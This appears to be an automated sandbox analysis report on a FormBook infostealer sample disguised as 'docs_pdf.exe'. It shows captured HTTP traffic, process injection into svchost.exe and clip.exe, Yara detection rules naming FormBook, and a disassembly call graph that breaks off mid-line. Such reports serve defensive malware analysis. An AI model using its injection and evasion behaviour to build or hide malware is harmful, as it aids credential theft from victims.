                                  Data Ascii: gin to <a href="https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=login">Loopia Customer zone</a> and actualize your plan.</p> <div class="divider"></div>
                                  Jul 13, 2024 00:09:01.325776100 CEST448INData Raw: 53 2c 20 79 6f 75 20 77 69 6c 6c 20 62 65 20 61 62 6c 65 20 74 6f 20 6d 61 6e 61 67 65 20 79 6f 75 72 20 64 6f 6d 61 69 6e 73 20 69 6e 20 6f 6e 65 20 73 69 6e 67 6c 65 20 70 6c 61 63 65 20 69 6e 20 4c 6f 6f 70 69 61 20 43 75 73 74 6f 6d 65 72 20
                                  Data Ascii: S, you will be able to manage your domains in one single place in Loopia Customer zone. <a href="https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=dns">Read more at loopia.co
                                  Jul 13, 2024 00:09:01.325792074 CEST1236INData Raw: 65 74 20 73 74 61 72 74 65 64 20 77 69 74 68 20 79 6f 75 72 20 77 65 62 73 69 74 65 2c 20 65 6d 61 69 6c 2c 20 62 6c 6f 67 20 61 6e 64 20 6f 6e 6c 69 6e 65 20 73 74 6f 72 65 2e 3c 2f 70 3e 0a 09 09 09 3c 70 3e 0a 09 09 09 3c 75 6c 3e 0a 09 09 09
                                  Data Ascii: et started with your website, email, blog and online store.</p><p><ul><li><a href="https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=wordpress">Create your websi
                                  Jul 13, 2024 00:09:01.325804949 CEST206INData Raw: 6c 6f 6f 70 69 61 2e 63 6f 6d 2f 73 75 70 70 6f 72 74 3f 75 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70
                                  Data Ascii: loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb">Contact us</a></p></span></div>... /END #footer --></div>... /END .content --></body></html>0


                                  Statistics

                                  CPU Usage

                                  Click to jump to process

                                  Memory Usage

                                  Click to jump to process

                                  High Level Behavior Distribution

                                  Click to dive into process behavior distribution

                                  Behavior

                                  Click to jump to process

                                  System Behavior

                                  General

                                  Target ID:0
                                  Start time:18:06:59
                                  Start date:12/07/2024
                                  Path:C:\Users\user\Desktop\docs_pdf.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\docs_pdf.exe"
                                  Imagebase:0xfb0000
                                  File size:1'190'400 bytes
                                  MD5 hash:942C50B985DC1E6EB49C1763D39D398F
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:low
                                  Has exited:true

                                  General

                                  Target ID:1
                                  Start time:18:07:00
                                  Start date:12/07/2024
                                  Path:C:\Windows\SysWOW64\svchost.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\docs_pdf.exe"
                                  Imagebase:0x970000
                                  File size:46'504 bytes
                                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1842966227.0000000003750000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1842966227.0000000003750000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1843022477.0000000004B90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1843022477.0000000004B90000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1842290329.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1842290329.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                  Reputation:moderate
                                  Has exited:true

                                  General

                                  Target ID:2
                                  Start time:18:07:10
                                  Start date:12/07/2024
                                  Path:C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe"
                                  Imagebase:0xba0000
                                  File size:140'800 bytes
                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2915081115.00000000037D0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2915081115.00000000037D0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                  Reputation:high
                                  Has exited:false

                                  General

                                  Target ID:3
                                  Start time:18:07:11
                                  Start date:12/07/2024
                                  Path:C:\Windows\SysWOW64\clip.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\SysWOW64\clip.exe"
                                  Imagebase:0x350000
                                  File size:24'576 bytes
                                  MD5 hash:E40CB198EBCD20CD16739F670D4D7B74
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2915212767.00000000045F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2915212767.00000000045F0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2913469899.0000000002780000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2913469899.0000000002780000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2915275774.0000000004630000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2915275774.0000000004630000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                  Reputation:moderate
                                  Has exited:false

                                  General

                                  Target ID:7
                                  Start time:18:07:24
                                  Start date:12/07/2024
                                  Path:C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe"
                                  Imagebase:0xba0000
                                  File size:140'800 bytes
                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2916711467.0000000004EA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.2916711467.0000000004EA0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                  Reputation:high
                                  Has exited:false

                                  General

                                  Target ID:8
                                  Start time:18:07:35
                                  Start date:12/07/2024
                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                  Imagebase:0x7ff6bf500000
                                  File size:676'768 bytes
                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Disassembly

                                  Reset < >

                                    Execution Graph

                                    Execution Coverage:4.1%
                                    Dynamic/Decrypted Code Coverage:0.4%
                                    Signature Coverage:2.6%
                                    Total number of Nodes:2000
                                    Total number of Limit Nodes:157
                                    execution_graph 97444 fb107d 97449 fb71eb 97444->97449 97446 fb108c 97480 fd2f80 97446->97480 97450 fb71fb __ftell_nolock 97449->97450 97483 fb77c7 97450->97483 97454 fb72ba 97495 fd074f 97454->97495 97461 fb77c7 59 API calls 97462 fb72eb 97461->97462 97514 fb7eec 97462->97514 97464 fb72f4 RegOpenKeyExW 97465 feecda RegQueryValueExW 97464->97465 97470 fb7316 Mailbox 97464->97470 97466 feed6c RegCloseKey 97465->97466 97467 feecf7 97465->97467 97466->97470 97478 feed7e _wcscat Mailbox __wsetenvp 97466->97478 97518 fd0ff6 97467->97518 97469 feed10 97528 fb538e 97469->97528 97470->97446 97473 fb7b52 59 API calls 97473->97478 97474 feed38 97531 fb7d2c 97474->97531 97476 feed52 97476->97466 97478->97470 97478->97473 97479 fb3f84 59 API calls 97478->97479 97540 fb7f41 97478->97540 97479->97478 97608 fd2e84 97480->97608 97482 fb1096 97484 fd0ff6 Mailbox 59 API calls 97483->97484 97485 fb77e8 97484->97485 97486 fd0ff6 Mailbox 59 API calls 97485->97486 97487 fb72b1 97486->97487 97488 fb4864 97487->97488 97544 fe1b90 97488->97544 97491 fb7f41 59 API calls 97492 fb4897 97491->97492 97546 fb48ae 97492->97546 97494 fb48a1 Mailbox 97494->97454 97496 fe1b90 __ftell_nolock 97495->97496 97497 fd075c GetFullPathNameW 97496->97497 97498 fd077e 97497->97498 97499 fb7d2c 59 API calls 97498->97499 97500 fb72c5 97499->97500 97501 fb7e0b 97500->97501 97502 fb7e1f 97501->97502 97503 fef173 97501->97503 97568 fb7db0 97502->97568 97573 fb8189 97503->97573 97506 fb72d3 97508 fb3f84 97506->97508 97507 fef17e __wsetenvp _memmove 97509 fb3f92 97508->97509 97513 fb3fb4 _memmove 97508->97513 97511 fd0ff6 Mailbox 59 API calls 97509->97511 97510 fd0ff6 Mailbox 59 API calls 97512 fb3fc8 97510->97512 97511->97513 97512->97461 97513->97510 97515 fb7f06 97514->97515 97517 fb7ef9 97514->97517 97516 fd0ff6 Mailbox 59 API calls 97515->97516 97516->97517 97517->97464 97520 fd0ffe 97518->97520 97521 fd1018 97520->97521 97523 fd101c std::exception::exception 97520->97523 97576 fd594c 97520->97576 97593 fd35e1 DecodePointer 97520->97593 97521->97469 97594 fd87db RaiseException 97523->97594 97525 fd1046 97595 fd8711 58 API calls _free 97525->97595 97527 fd1058 97527->97469 97529 fd0ff6 Mailbox 59 API calls 97528->97529 97530 fb53a0 RegQueryValueExW 97529->97530 97530->97474 97530->97476 97532 fb7d38 __wsetenvp 97531->97532 97533 fb7da5 97531->97533 97536 fb7d4e 97532->97536 97537 fb7d73 97532->97537 97534 fb7e8c 59 API calls 97533->97534 97535 fb7d56 _memmove 97534->97535 97535->97476 97604 fb8087 97536->97604 97538 fb8189 59 API calls 97537->97538 97538->97535 97541 fb7f50 __wsetenvp _memmove 97540->97541 97542 fd0ff6 Mailbox 59 API calls 97541->97542 97543 fb7f8e 97542->97543 97543->97478 97545 fb4871 GetModuleFileNameW 97544->97545 97545->97491 97547 fe1b90 __ftell_nolock 97546->97547 97548 fb48bb GetFullPathNameW 97547->97548 97549 fb48da 97548->97549 97550 fb48f7 97548->97550 97551 fb7d2c 59 API calls 97549->97551 97552 fb7eec 59 API calls 97550->97552 97553 fb48e6 97551->97553 97552->97553 97556 fb7886 97553->97556 97557 fb7894 97556->97557 97560 fb7e8c 97557->97560 97559 fb48f2 97559->97494 97561 fb7ea3 _memmove 97560->97561 97562 fb7e9a 97560->97562 97561->97559 97562->97561 97564 fb7faf 97562->97564 97565 fb7fc2 97564->97565 97567 fb7fbf _memmove 97564->97567 97566 fd0ff6 Mailbox 59 API calls 97565->97566 97566->97567 97567->97561 97569 fb7dbf __wsetenvp 97568->97569 97570 fb8189 59 API calls 97569->97570 97571 fb7dd0 _memmove 97569->97571 97572 fef130 _memmove 97570->97572 97571->97506 97574 fd0ff6 Mailbox 59 API calls 97573->97574 97575 fb8193 97574->97575 97575->97507 97577 fd59c7 97576->97577 97584 fd5958 97576->97584 97602 fd35e1 DecodePointer 97577->97602 97579 fd59cd 97603 fd8d68 58 API calls __getptd_noexit 97579->97603 97582 fd598b RtlAllocateHeap 97582->97584 97592 fd59bf 97582->97592 97584->97582 97585 fd59b3 97584->97585 97586 fd5963 97584->97586 97590 fd59b1 97584->97590 97599 fd35e1 DecodePointer 97584->97599 97600 fd8d68 58 API calls __getptd_noexit 97585->97600 97586->97584 97596 fda3ab 58 API calls __NMSG_WRITE 97586->97596 97597 fda408 58 API calls 6 library calls 97586->97597 97598 fd32df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 97586->97598 97601 fd8d68 58 API calls __getptd_noexit 97590->97601 97592->97520 97593->97520 97594->97525 97595->97527 97596->97586 97597->97586 97599->97584 97600->97590 97601->97592 97602->97579 97603->97592 97605 fb8099 97604->97605 97606 fb809f 97604->97606 97605->97535 97607 fd0ff6 Mailbox 59 API calls 97606->97607 97607->97605 97609 fd2e90 __alloc_osfhnd 97608->97609 97616 fd3457 97609->97616 97615 fd2eb7 __alloc_osfhnd 97615->97482 97633 fd9e4b 97616->97633 97618 fd2e99 97619 fd2ec8 DecodePointer DecodePointer 97618->97619 97620 fd2ef5 97619->97620 97621 fd2ea5 97619->97621 97620->97621 97679 fd89e4 59 API calls _W_expandtime 97620->97679 97630 fd2ec2 97621->97630 97623 fd2f58 EncodePointer EncodePointer 97623->97621 97624 fd2f07 97624->97623 97625 fd2f2c 97624->97625 97680 fd8aa4 61 API calls 2 library calls 97624->97680 97625->97621 97628 fd2f46 EncodePointer 97625->97628 97681 fd8aa4 61 API calls 2 library calls 97625->97681 97628->97623 97629 fd2f40 97629->97621 97629->97628 97682 fd3460 97630->97682 97634 fd9e5c 97633->97634 97635 fd9e6f EnterCriticalSection 97633->97635 97640 fd9ed3 97634->97640 97635->97618 97637 fd9e62 97637->97635 97664 fd32f5 58 API calls 3 library calls 97637->97664 97641 fd9edf __alloc_osfhnd 97640->97641 97642 fd9ee8 97641->97642 97643 fd9f00 97641->97643 97665 fda3ab 58 API calls __NMSG_WRITE 97642->97665 97651 fd9f21 __alloc_osfhnd 97643->97651 97668 fd8a5d 58 API calls 2 library calls 97643->97668 97645 fd9eed 97666 fda408 58 API calls 6 library calls 97645->97666 97648 fd9f15 97649 fd9f1c 97648->97649 97650 fd9f2b 97648->97650 97669 fd8d68 58 API calls __getptd_noexit 97649->97669 97654 fd9e4b __lock 58 API calls 97650->97654 97651->97637 97652 fd9ef4 97667 fd32df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 97652->97667 97656 fd9f32 97654->97656 97658 fd9f3f 97656->97658 97659 fd9f57 97656->97659 97670 fda06b InitializeCriticalSectionAndSpinCount 97658->97670 97671 fd2f95 97659->97671 97662 fd9f4b 97677 fd9f73 LeaveCriticalSection _doexit 97662->97677 97665->97645 97666->97652 97668->97648 97669->97651 97670->97662 97672 fd2f9e RtlFreeHeap 97671->97672 97673 fd2fc7 _free 97671->97673 97672->97673 97674 fd2fb3 97672->97674 97673->97662 97678 fd8d68 58 API calls __getptd_noexit 97674->97678 97676 fd2fb9 GetLastError 97676->97673 97677->97651 97678->97676 97679->97624 97680->97625 97681->97629 97685 fd9fb5 LeaveCriticalSection 97682->97685 97684 fd2ec7 97684->97615 97685->97684 97686 fb3633 97687 fb366a 97686->97687 97688 fb3688 97687->97688 97689 fb36e7 97687->97689 97726 fb36e5 97687->97726 97693 fb375d PostQuitMessage 97688->97693 97694 fb3695 97688->97694 97691 fed31c 97689->97691 97692 fb36ed 97689->97692 97690 fb36ca DefWindowProcW 97698 fb36d8 97690->97698 97736 fc11d0 10 API calls Mailbox 97691->97736 97699 fb36f2 97692->97699 97700 fb3715 SetTimer RegisterWindowMessageW 97692->97700 97693->97698 97695 fed38f 97694->97695 97696 fb36a0 97694->97696 97741 1012a16 71 API calls _memset 97695->97741 97701 fb36a8 97696->97701 97702 fb3767 97696->97702 97706 fed2bf 97699->97706 97707 fb36f9 KillTimer 97699->97707 97700->97698 97703 fb373e CreatePopupMenu 97700->97703 97708 fb36b3 97701->97708 97709 fed374 97701->97709 97734 fb4531 64 API calls _memset 97702->97734 97703->97698 97705 fed343 97737 fc11f3 331 API calls Mailbox 97705->97737 97713 fed2f8 MoveWindow 97706->97713 97714 fed2c4 97706->97714 97731 fb44cb Shell_NotifyIconW _memset 97707->97731 97716 fb374b 97708->97716 97717 fb36be 97708->97717 97709->97690 97740 100817e 59 API calls Mailbox 97709->97740 97710 fed3a1 97710->97690 97710->97698 97713->97698 97719 fed2c8 97714->97719 97720 fed2e7 SetFocus 97714->97720 97733 fb45df 81 API calls _memset 97716->97733 97717->97690 97738 fb44cb Shell_NotifyIconW _memset 97717->97738 97718 fb375b 97718->97698 97719->97717 97723 fed2d1 97719->97723 97720->97698 97721 fb370c 97732 fb3114 DeleteObject DestroyWindow Mailbox 97721->97732 97735 fc11d0 10 API calls Mailbox 97723->97735 97726->97690 97729 fed368 97739 fb43db 68 API calls _memset 97729->97739 97731->97721 97732->97698 97733->97718 97734->97718 97735->97698 97736->97705 97737->97717 97738->97729 97739->97726 97740->97726 97741->97710 97742 f823b0 97756 f80000 97742->97756 97744 f8245e 97759 f822a0 97744->97759 97762 f83490 GetPEB 97756->97762 97758 f8068b 97758->97744 97760 f822a9 Sleep 97759->97760 97761 f822b7 97760->97761 97763 f834ba 97762->97763 97763->97758 97764 fb1016 97769 fb4ad2 97764->97769 97767 fd2f80 __cinit 67 API calls 97768 fb1025 97767->97768 97770 fd0ff6 Mailbox 59 API calls 97769->97770 97771 fb4ada 97770->97771 97772 fb101b 97771->97772 97776 fb4a94 97771->97776 97772->97767 97777 fb4a9d 97776->97777 97779 fb4aaf 97776->97779 97778 fd2f80 __cinit 67 API calls 97777->97778 97778->97779 97780 fb4afe 97779->97780 97781 fb77c7 59 API calls 97780->97781 97782 fb4b16 GetVersionExW 97781->97782 97783 fb7d2c 59 API calls 97782->97783 97784 fb4b59 97783->97784 97785 fb7e8c 59 API calls 97784->97785 97790 fb4b86 97784->97790 97786 fb4b7a 97785->97786 97787 fb7886 59 API calls 97786->97787 97787->97790 97788 fb4bf1 GetCurrentProcess IsWow64Process 97789 fb4c0a 97788->97789 97792 fb4c89 GetSystemInfo 97789->97792 97793 fb4c20 97789->97793 97790->97788 97791 fedc8d 97790->97791 97794 fb4c56 97792->97794 97804 fb4c95 97793->97804 97794->97772 97797 fb4c7d GetSystemInfo 97799 fb4c47 97797->97799 97798 fb4c32 97800 fb4c95 2 API calls 97798->97800 97799->97794 97801 fb4c4d FreeLibrary 97799->97801 97802 fb4c3a GetNativeSystemInfo 97800->97802 97801->97794 97802->97799 97805 fb4c2e 97804->97805 97806 fb4c9e LoadLibraryA 97804->97806 97805->97797 97805->97798 97806->97805 97807 fb4caf GetProcAddress 97806->97807 97807->97805 97808 fd7e93 97809 fd7e9f __alloc_osfhnd 97808->97809 97845 fda048 GetStartupInfoW 97809->97845 97811 fd7ea4 97847 fd8dbc GetProcessHeap 97811->97847 97813 fd7efc 97814 fd7f07 97813->97814 97930 fd7fe3 58 API calls 3 library calls 97813->97930 97848 fd9d26 97814->97848 97817 fd7f0d 97818 fd7f18 __RTC_Initialize 97817->97818 97931 fd7fe3 58 API calls 3 library calls 97817->97931 97869 fdd812 97818->97869 97821 fd7f27 97822 fd7f33 GetCommandLineW 97821->97822 97932 fd7fe3 58 API calls 3 library calls 97821->97932 97888 fe5173 GetEnvironmentStringsW 97822->97888 97825 fd7f32 97825->97822 97828 fd7f4d 97829 fd7f58 97828->97829 97933 fd32f5 58 API calls 3 library calls 97828->97933 97898 fe4fa8 97829->97898 97832 fd7f5e 97833 fd7f69 97832->97833 97934 fd32f5 58 API calls 3 library calls 97832->97934 97912 fd332f 97833->97912 97836 fd7f71 97837 fd7f7c __wwincmdln 97836->97837 97935 fd32f5 58 API calls 3 library calls 97836->97935 97918 fb492e 97837->97918 97840 fd7f90 97841 fd7f9f 97840->97841 97936 fd3598 58 API calls _doexit 97840->97936 97937 fd3320 58 API calls _doexit 97841->97937 97844 fd7fa4 __alloc_osfhnd 97846 fda05e 97845->97846 97846->97811 97847->97813 97938 fd33c7 36 API calls 2 library calls 97848->97938 97850 fd9d2b 97939 fd9f7c InitializeCriticalSectionAndSpinCount __alloc_osfhnd 97850->97939 97852 fd9d30 97853 fd9d34 97852->97853 97941 fd9fca TlsAlloc 97852->97941 97940 fd9d9c 61 API calls 2 library calls 97853->97940 97856 fd9d46 97856->97853 97858 fd9d51 97856->97858 97857 fd9d39 97857->97817 97942 fd8a15 97858->97942 97861 fd9d93 97950 fd9d9c 61 API calls 2 library calls 97861->97950 97864 fd9d72 97864->97861 97866 fd9d78 97864->97866 97865 fd9d98 97865->97817 97949 fd9c73 58 API calls 4 library calls 97866->97949 97868 fd9d80 GetCurrentThreadId 97868->97817 97870 fdd81e __alloc_osfhnd 97869->97870 97871 fd9e4b __lock 58 API calls 97870->97871 97872 fdd825 97871->97872 97873 fd8a15 __calloc_crt 58 API calls 97872->97873 97874 fdd836 97873->97874 97875 fdd8a1 GetStartupInfoW 97874->97875 97876 fdd841 __alloc_osfhnd @_EH4_CallFilterFunc@8 97874->97876 97882 fdd8b6 97875->97882 97885 fdd9e5 97875->97885 97876->97821 97877 fddaad 97964 fddabd LeaveCriticalSection _doexit 97877->97964 97879 fd8a15 __calloc_crt 58 API calls 97879->97882 97880 fdda32 GetStdHandle 97880->97885 97881 fdda45 GetFileType 97881->97885 97882->97879 97884 fdd904 97882->97884 97882->97885 97883 fdd938 GetFileType 97883->97884 97884->97883 97884->97885 97962 fda06b InitializeCriticalSectionAndSpinCount 97884->97962 97885->97877 97885->97880 97885->97881 97963 fda06b InitializeCriticalSectionAndSpinCount 97885->97963 97889 fd7f43 97888->97889 97890 fe5184 97888->97890 97894 fe4d6b GetModuleFileNameW 97889->97894 97965 fd8a5d 58 API calls 2 library calls 97890->97965 97892 fe51aa _memmove 97893 fe51c0 FreeEnvironmentStringsW 97892->97893 97893->97889 97895 fe4d9f _wparse_cmdline 97894->97895 97897 fe4ddf _wparse_cmdline 97895->97897 97966 fd8a5d 58 API calls 2 library calls 97895->97966 97897->97828 97899 fe4fb9 97898->97899 97900 fe4fc1 __wsetenvp 97898->97900 97899->97832 97901 fd8a15 __calloc_crt 58 API calls 97900->97901 97905 fe4fea __wsetenvp 97901->97905 97902 fe5041 97903 fd2f95 _free 58 API calls 97902->97903 97903->97899 97904 fd8a15 __calloc_crt 58 API calls 97904->97905 97905->97899 97905->97902 97905->97904 97906 fe5066 97905->97906 97909 fe507d 97905->97909 97967 fe4857 58 API calls _W_expandtime 97905->97967 97908 fd2f95 _free 58 API calls 97906->97908 97908->97899 97968 fd9006 IsProcessorFeaturePresent 97909->97968 97911 fe5089 97911->97832 97914 fd333b __IsNonwritableInCurrentImage 97912->97914 97991 fda711 97914->97991 97915 fd3359 __initterm_e 97916 fd2f80 __cinit 67 API calls 97915->97916 97917 fd3378 __cinit __IsNonwritableInCurrentImage 97915->97917 97916->97917 97917->97836 97919 fb4948 97918->97919 97929 fb49e7 97918->97929 97920 fb4982 IsThemeActive 97919->97920 97994 fd35ac 97920->97994 97924 fb49ae 98006 fb4a5b SystemParametersInfoW SystemParametersInfoW 97924->98006 97926 fb49ba 98007 fb3b4c 97926->98007 97928 fb49c2 SystemParametersInfoW 97928->97929 97929->97840 97930->97814 97931->97818 97932->97825 97936->97841 97937->97844 97938->97850 97939->97852 97940->97857 97941->97856 97945 fd8a1c 97942->97945 97944 fd8a57 97944->97861 97948 fda026 TlsSetValue 97944->97948 97945->97944 97947 fd8a3a 97945->97947 97951 fe5446 97945->97951 97947->97944 97947->97945 97959 fda372 Sleep 97947->97959 97948->97864 97949->97868 97950->97865 97952 fe5451 97951->97952 97957 fe546c 97951->97957 97953 fe545d 97952->97953 97952->97957 97960 fd8d68 58 API calls __getptd_noexit 97953->97960 97955 fe547c HeapAlloc 97956 fe5462 97955->97956 97955->97957 97956->97945 97957->97955 97957->97956 97961 fd35e1 DecodePointer 97957->97961 97959->97947 97960->97956 97961->97957 97962->97884 97963->97885 97964->97876 97965->97892 97966->97897 97967->97905 97969 fd9011 97968->97969 97974 fd8e99 97969->97974 97973 fd902c 97973->97911 97975 fd8eb3 _memset __call_reportfault 97974->97975 97976 fd8ed3 IsDebuggerPresent 97975->97976 97982 fda395 SetUnhandledExceptionFilter UnhandledExceptionFilter 97976->97982 97978 fd8f97 __call_reportfault 97983 fdc836 97978->97983 97980 fd8fba 97981 fda380 GetCurrentProcess TerminateProcess 97980->97981 97981->97973 97982->97978 97984 fdc83e 97983->97984 97985 fdc840 IsProcessorFeaturePresent 97983->97985 97984->97980 97987 fe5b5a 97985->97987 97990 fe5b09 5 API calls 2 library calls 97987->97990 97989 fe5c3d 97989->97980 97990->97989 97992 fda714 EncodePointer 97991->97992 97992->97992 97993 fda72e 97992->97993 97993->97915 97995 fd9e4b __lock 58 API calls 97994->97995 97996 fd35b7 DecodePointer EncodePointer 97995->97996 98059 fd9fb5 LeaveCriticalSection 97996->98059 97998 fb49a7 97999 fd3614 97998->97999 98000 fd361e 97999->98000 98001 fd3638 97999->98001 98000->98001 98060 fd8d68 58 API calls __getptd_noexit 98000->98060 98001->97924 98003 fd3628 98061 fd8ff6 9 API calls _W_expandtime 98003->98061 98005 fd3633 98005->97924 98006->97926 98008 fb3b59 __ftell_nolock 98007->98008 98009 fb77c7 59 API calls 98008->98009 98010 fb3b63 GetCurrentDirectoryW 98009->98010 98062 fb3778 98010->98062 98012 fb3b8c IsDebuggerPresent 98013 fb3b9a 98012->98013 98014 fed4ad MessageBoxA 98012->98014 98015 fed4c7 98013->98015 98016 fb3bb7 98013->98016 98045 fb3c73 98013->98045 98014->98015 98262 fb7373 59 API calls Mailbox 98015->98262 98143 fb73e5 98016->98143 98017 fb3c7a SetCurrentDirectoryW 98020 fb3c87 Mailbox 98017->98020 98020->97928 98021 fed4d7 98026 fed4ed SetCurrentDirectoryW 98021->98026 98023 fb3bd5 GetFullPathNameW 98024 fb7d2c 59 API calls 98023->98024 98025 fb3c10 98024->98025 98159 fc0a8d 98025->98159 98026->98020 98029 fb3c2e 98045->98017 98059->97998 98060->98003 98061->98005 98063 fb77c7 59 API calls 98062->98063 98064 fb378e 98063->98064 98273 fb3d43 98064->98273 98066 fb37ac 98067 fb4864 61 API calls 98066->98067 98068 fb37c0 98067->98068 98069 fb7f41 59 API calls 98068->98069 98070 fb37cd 98069->98070 98287 fb4f3d 98070->98287 98073 fed3ae 98358 10197e5 98073->98358 98074 fb37ee Mailbox 98311 fb81a7 98074->98311 98078 fed3cd 98079 fd2f95 _free 58 API calls 98078->98079 98082 fed3da 98079->98082 98084 fb4faa 84 API calls 98082->98084 98086 fed3e3 98084->98086 98090 fb3ee2 59 API calls 98086->98090 98087 fb7f41 59 API calls 98088 fb381a 98087->98088 98318 fb8620 98088->98318 98092 fed3fe 98090->98092 98091 fb382c Mailbox 98093 fb7f41 59 API calls 98091->98093 98094 fb3ee2 59 API calls 98092->98094 98095 fb3852 98093->98095 98096 fed41a 98094->98096 98097 fb8620 69 API calls 98095->98097 98098 fb4864 61 API calls 98096->98098 98099 fb3861 Mailbox 98097->98099 98100 fed43f 98098->98100 98103 fb77c7 59 API calls 98099->98103 98101 fb3ee2 59 API calls 98100->98101 98102 fed44b 98101->98102 98104 fb81a7 59 API calls 98102->98104 98105 fb387f 98103->98105 98106 fed459 98104->98106 98322 fb3ee2 98105->98322 98108 fb3ee2 59 API calls 98106->98108 98110 fed468 98108->98110 98116 fb81a7 59 API calls 98110->98116 98112 fb3899 98112->98086 98113 fb38a3 98112->98113 98114 fd313d _W_store_winword 60 API calls 98113->98114 98115 fb38ae 98114->98115 98115->98092 98117 fb38b8 98115->98117 98118 fed48a 98116->98118 98119 fd313d _W_store_winword 60 API calls 98117->98119 98120 fb3ee2 59 API calls 98118->98120 98121 fb38c3 98119->98121 98122 fed497 98120->98122 98121->98096 98123 fb38cd 98121->98123 98122->98122 98124 fd313d _W_store_winword 60 API calls 98123->98124 98125 fb38d8 98124->98125 98125->98110 98126 fb3919 98125->98126 98128 fb3ee2 59 API calls 98125->98128 98126->98110 98127 fb3926 98126->98127 98338 fb942e 98127->98338 98129 fb38fc 98128->98129 98131 fb81a7 59 API calls 98129->98131 98133 fb390a 98131->98133 98135 fb3ee2 59 API calls 98133->98135 98135->98126 98138 fb93ea 59 API calls 98140 fb3961 98138->98140 98139 fb9040 60 API calls 98139->98140 98140->98138 98140->98139 98141 fb3ee2 59 API calls 98140->98141 98142 fb39a7 Mailbox 98140->98142 98141->98140 98142->98012 98144 fb73f2 __ftell_nolock 98143->98144 98145 fb740b 98144->98145 98146 feee4b _memset 98144->98146 98147 fb48ae 60 